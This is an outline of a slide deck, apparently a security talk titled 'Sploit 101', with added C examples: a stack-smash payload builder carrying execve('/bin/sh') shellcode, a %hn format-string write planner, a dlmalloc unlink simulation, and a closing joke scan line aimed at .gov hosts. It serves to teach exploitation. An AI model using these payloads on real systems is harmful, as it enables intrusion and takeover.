Sploit 101: Buffer Overflows, Format Strings, Heap Overflows
Warning
Basics For Sploit Testing
The Buffer Overflow |
Example Vuln Program |
Program Layout in Memory |
Program Layout in Memory |
Important Stack Info - Registers |
Getting ESP |
Shellcode |
Example of Shellcode (Aleph1) |
Using gdb To Find The Sweet Spot |
gdb In Action |
Pulling This All Together |
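Added example for the "Pulling This All Together" slide (not part of the original deck): the exploit buffer as Aleph1 laid it out, NOP sled, then shellcode, then the guessed return address repeated to the end. The shellcode bytes are the Linux/x86 execve("/bin/sh") string from Phrack 49, which the deck already references; the buffer size, sled length and return address in main() are arbitrary values chosen for illustration and have to be tuned per target with gdb as the earlier slides describe.

```c
#include <stdint.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

/* Aleph1's Linux/x86 execve("/bin/sh") shellcode from "Smashing the Stack
 * for Fun and Profit" (Phrack 49): 45 bytes, no NUL bytes inside. */
static const char shellcode[] =
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/sh";

#define SHELLCODE_LEN (sizeof(shellcode) - 1)

/* Build the classic 32-bit stack-smash payload:
 *
 *   [ NOP sled (nops bytes) ][ shellcode ][ ret, ret, ret ... to bufsize ]
 *
 * bufsize : bytes written into the victim buffer; larger than the buffer so
 *           the saved return address (EIP) is covered
 * ret     : guessed address inside the NOP sled, normally get_sp() - offset,
 *           where get_sp() reads ESP in the exploit process (the "Getting
 *           ESP" trick) and offset is tuned with gdb
 * nops    : length of the sled; more NOPs means a sloppier guess still works
 *
 * Returns a malloc'd, NUL-terminated string (the caller frees it) or NULL if
 * the three parts do not fit. */
char *build_payload(size_t bufsize, uint32_t ret, size_t nops)
{
    if (nops + SHELLCODE_LEN + 4 > bufsize)
        return NULL;
    char *buf = malloc(bufsize + 1);
    if (buf == NULL)
        return NULL;

    /* 1. Fill everything with the return address in little-endian order.
     *    Where saved EIP sits relative to the start of the buffer depends on
     *    the victim's frame; if the 4-byte pattern is out of phase with it,
     *    bufsize is adjusted by 1..3 and the exploit rerun. */
    for (size_t i = 0; i < bufsize; i++)
        buf[i] = (char)((ret >> (8 * (i % 4))) & 0xff);

    /* 2. NOP sled (0x90) at the front gives the address guess some slack. */
    memset(buf, 0x90, nops);

    /* 3. Shellcode directly behind the sled: execution slides into it. */
    memcpy(buf + nops, shellcode, SHELLCODE_LEN);

    buf[bufsize] = '\0';
    return buf;
}

/* The payload reaches the victim through strcpy()/argv/environment, which
 * all stop at the first NUL; a 0x00 byte anywhere truncates the attack. */
int payload_has_nul(const char *buf, size_t len)
{
    for (size_t i = 0; i < len; i++)
        if (buf[i] == '\0')
            return 1;
    return 0;
}

int main(void)
{
    /* Illustrative values: a 512-byte write against a smaller victim buffer,
     * 200 NOPs, and a return address in the usual 32-bit Linux stack range. */
    char *p = build_payload(512, 0xbffff5a0u, 200);
    if (p == NULL || payload_has_nul(p, 512))
        return 1;
    fwrite(p, 1, 512, stdout);     /* pipe or export this into the victim */
    free(p);
    return 0;
}
```

The NOP sled is what makes the address guess forgiving: any ret that lands between buf[0] and buf[nops-1] slides into the shellcode. If the guess is off by more than the sled, the offset from ESP is changed and the payload rebuilt.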
Live Demo |
Small Buffer |
Use An ENV Variable |
Small Buffer Layout |
Live Demo |
Remote Exploits |
Example Vulnerable Remote Program |
Assuming You Have Source |
Live Demo |
Format String Exploit |
Vulnerable Format String Code |
Steps For Format String Exploitation |
Stack Mapping |
Reading Memory Locations |
Writing To Memory |
.dtors |
Computing .dtors Location |
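Added example for the "Vulnerable Format String Code", "Writing To Memory" and ".dtors" slides (not part of the original deck): the bug and its one-line fix, plus the arithmetic behind a %hn write. %n stores the number of bytes printed so far, so the value is delivered as two 16-bit halves by padding the output with %u widths until the running count matches each half modulo 2^16. The target address, value and argument positions in the comments are made-up values for illustration; on these slides the usual target is the .dtors entry (objdump -s -j .dtors ./victim shows where it lives) and the value is the shellcode address.

```c
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* The bug: user data used as the format. "%x" leaks stack words, "%s" reads
 * through a pointer found on the stack, "%n"/"%hn" write the byte count
 * through one. */
void log_vulnerable(const char *user)
{
    printf(user);            /* format string chosen by the attacker */
}

/* The fix: the format is a constant, the data is an argument. */
void log_fixed(const char *user)
{
    printf("%s", user);
}

/* Plan for storing a 32-bit value at addr with two %hn writes (16 bits
 * each). The smaller half is written first so both pads stay positive. */
struct hn_plan {
    uint32_t first_addr;    /* where the first %hn writes (addr or addr + 2) */
    uint32_t second_addr;   /* where the second %hn writes */
    unsigned pad1;          /* width of the %u before the first %hn */
    unsigned pad2;          /* width of the %u before the second %hn */
};

#define MIN_PAD 8   /* a %u prints at least its digits; keep widths above that */

/* already: bytes printf emits before the first pad, e.g. the two target
 * addresses placed at the start of the format string (8 bytes). */
int plan_hn_write(uint32_t addr, uint32_t value, unsigned already,
                  struct hn_plan *p)
{
    if (p == NULL)
        return -1;
    uint32_t lo = value & 0xffffu;   /* stored at addr     (little-endian) */
    uint32_t hi = value >> 16;       /* stored at addr + 2 */
    uint32_t first, second;
    if (lo <= hi) {
        first = lo;  p->first_addr = addr;      second = hi;  p->second_addr = addr + 2;
    } else {
        first = hi;  p->first_addr = addr + 2;  second = lo;  p->second_addr = addr;
    }
    /* counts only matter modulo 2^16 because %hn stores 16 bits */
    p->pad1 = (first + 0x10000u - (already % 0x10000u)) % 0x10000u;
    if (p->pad1 < MIN_PAD) p->pad1 += 0x10000u;
    p->pad2 = (second + 0x10000u - first) % 0x10000u;
    if (p->pad2 < MIN_PAD) p->pad2 += 0x10000u;
    return 0;
}

/* Emit the format string using direct parameter access (%N$hn, supported by
 * glibc). pos1/pos2 are the argument positions holding first_addr and
 * second_addr; with the addresses at the front of the buffer they are found
 * by counting %x pops as on the "Stack Mapping" slide. */
int build_hn_format(char *out, size_t n, const struct hn_plan *p,
                    unsigned pos1, unsigned pos2)
{
    return snprintf(out, n, "%%%uu%%%u$hn%%%uu%%%u$hn",
                    p->pad1, pos1, p->pad2, pos2);
}

/* Dry run of what printf would do: count the bytes and store the low 16 bits
 * of the count at each %hn target. Memory is a 4-byte image of addr..addr+3,
 * so nothing real is written. Returns the 32-bit value that results. */
uint32_t simulate_hn_write(const struct hn_plan *p, unsigned already, uint32_t addr)
{
    uint8_t mem[4] = {0, 0, 0, 0};
    unsigned count = already + p->pad1;
    uint32_t off = p->first_addr - addr;
    mem[off]     = (uint8_t)(count & 0xff);
    mem[off + 1] = (uint8_t)((count >> 8) & 0xff);
    count += p->pad2;
    off = p->second_addr - addr;
    mem[off]     = (uint8_t)(count & 0xff);
    mem[off + 1] = (uint8_t)((count >> 8) & 0xff);
    return (uint32_t)mem[0] | ((uint32_t)mem[1] << 8) |
           ((uint32_t)mem[2] << 16) | ((uint32_t)mem[3] << 24);
}
```

Two %hn writes are used instead of one %n because a single %n would have to print up to 4 GB of padding to reach an address-sized count; two 16-bit halves never need more than 128 KB of output between them.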
Live Demo |
Heap Overflow – Simple Example |
Heap Overflow – Realistic Example |
Malloc |
Malloc |
Bins |
dlmalloc Functions |
free() Behavior |
unlink() |
Vulnerable Heap Overflow Code |
We Need Two Values |
What to Inject |
What to Inject |
What to Inject |
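Added example for the "unlink()", "We Need Two Values" and "What to Inject" slides (not part of the original deck): the old dlmalloc unlink macro traced on a toy heap image so its two pointer stores can be seen without touching the real allocator. The overflow writes into the neighbouring chunk's header; with the PREV_INUSE bit of its size field cleared, free() on that neighbour treats our overflowed chunk as free, consolidates with it and runs unlink() on fd/bk values we wrote. All addresses below are arbitrary offsets in the toy heap, not real process addresses.

```c
#include <stdint.h>
#include <string.h>

/* A flat 32-bit heap image. "Addresses" are offsets into mem[], so the write
 * pattern of unlink() can be traced without corrupting the real allocator. */
#define HEAP_SIZE 0x1000u
typedef struct { uint8_t mem[HEAP_SIZE]; } heap_t;

static uint32_t rd32(const heap_t *h, uint32_t a)
{
    if (a + 4 > HEAP_SIZE) return 0;
    return (uint32_t)h->mem[a] | ((uint32_t)h->mem[a + 1] << 8) |
           ((uint32_t)h->mem[a + 2] << 16) | ((uint32_t)h->mem[a + 3] << 24);
}

static void wr32(heap_t *h, uint32_t a, uint32_t v)
{
    if (a + 4 > HEAP_SIZE) return;
    h->mem[a]     = (uint8_t)v;          h->mem[a + 1] = (uint8_t)(v >> 8);
    h->mem[a + 2] = (uint8_t)(v >> 16);  h->mem[a + 3] = (uint8_t)(v >> 24);
}

/* Old dlmalloc (glibc 2.2-era) free chunk header on 32-bit:
 *   +0 prev_size   +4 size   +8 fd   +12 bk
 * The unlink macro free() runs when it consolidates a neighbour:
 *   FD = P->fd;  BK = P->bk;  FD->bk = BK;  BK->fd = FD;
 * i.e. *(FD + 12) = BK and *(BK + 8) = FD, with FD and BK read from memory
 * the overflow controls. */
#define FD_OFF  8u
#define BK_OFF 12u

void unlink_sim(heap_t *h, uint32_t p)
{
    uint32_t fd = rd32(h, p + FD_OFF);
    uint32_t bk = rd32(h, p + BK_OFF);
    wr32(h, fd + BK_OFF, bk);   /* FD->bk = BK : the 4-byte write we want */
    wr32(h, bk + FD_OFF, fd);   /* BK->fd = FD : side effect on the value */
}

/* The two values to inject into the fake chunk header:
 *   fd = target - 12   so FD->bk lands exactly on target
 *   bk = value         what ends up there, e.g. the shellcode address
 * target is typically a GOT entry (free's own is popular) or a .dtors slot. */
void forge_fake_chunk(heap_t *h, uint32_t fake, uint32_t target, uint32_t value)
{
    wr32(h, fake + FD_OFF, target - BK_OFF);
    wr32(h, fake + BK_OFF, value);
}

/* End to end: forge the header, run unlink on it, report what landed at
 * target and what the BK->fd store clobbered at value + 8. That clobber is
 * why heap shellcode usually opens with a short jmp over its bytes 8..11. */
uint32_t demo_unlink_write(uint32_t target, uint32_t value, uint32_t *clobbered)
{
    heap_t h;
    memset(&h, 0, sizeof h);
    uint32_t fake = 0x100u;      /* where the overflowed chunk header sits */
    forge_fake_chunk(&h, fake, target, value);
    unlink_sim(&h, fake);
    if (clobbered)
        *clobbered = rd32(&h, value + FD_OFF);
    return rd32(&h, target);
}
```

Both stores happen unconditionally in this allocator generation, which is exactly the weakness: there is no check that FD->bk and BK->fd point back at P. Later glibc added that sanity check ("corrupted double-linked list"), which is why this exact technique stops working there.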
Live Demo |
Finding The Bugs To Sploit |
Questions? |
./nmrc -sS -T Paranoid *.gov |